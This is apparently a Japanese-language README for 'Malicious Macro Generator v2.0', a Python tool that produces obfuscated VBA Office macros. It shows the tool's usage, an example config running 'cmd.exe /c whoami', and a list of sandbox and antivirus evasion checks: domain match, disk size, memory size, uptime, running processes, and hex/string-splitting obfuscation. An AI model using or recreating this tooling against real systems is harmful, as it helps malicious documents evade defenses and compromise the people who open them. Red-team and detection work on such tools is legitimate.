簡単なユーティリティで、難読化されたマクロを生成し、AV / サンドボックス回避メカニズムも含んでいます。
Python 2.7
MMG.Malicious Macro Generator v2.0 - RingZer0 Team
Author: Mr.Un1k0d3r [email protected]
Usage: MMG.py [config] [output] (optional parameters)
[config] Config file that contain generator information
[output] Output filename for the macro
-l --list List of all available payloads and evasion techniques
-s --split_strings Randomly split strings at parts
-x --strings_to_hex Encode strings to hex
python MMG.py configs/generic-cmd.json malicious.vba
プロジェクト設定ファイルの例。
{
"description": "Generic command exec payload\nEvasion technique set to domain check",
"template": "templates/payloads/generic-cmd-evasion-template.vba",
"varcount": 150,
"encodingoffset": 4,
"chunksize": 200,
"encodedvars": {
"DOMAIN":"RINGZER0"
},
"vars": [],
"evasion": ["encoder", "domain"],
"payload": "cmd.exe /c whoami"
}
マクロはUSERDOMAIN環境変数を取得し、その値を事前定義された値と比較します。一致した場合、最終ペイロードが実行されます。
マクロは総ディスク容量を確認します。VMやテストマシンはほとんどの場合、小容量のディスクを使用します。
マクロは総メモリサイズを確認します。VMやテストマシンは少ないリソースを使用します。
マクロはシステムの稼働時間を確認します。サンドボックスは短い稼働時間を返します。
マクロは特定のプロセスが実行されているかどうかを確認します(例: outlook.exe)
Pythonスクリプトはまた、ヒューリスティック検出を回避するために難読化されたコードを生成します。
Mr.Un1k0d3r RingZer0 Team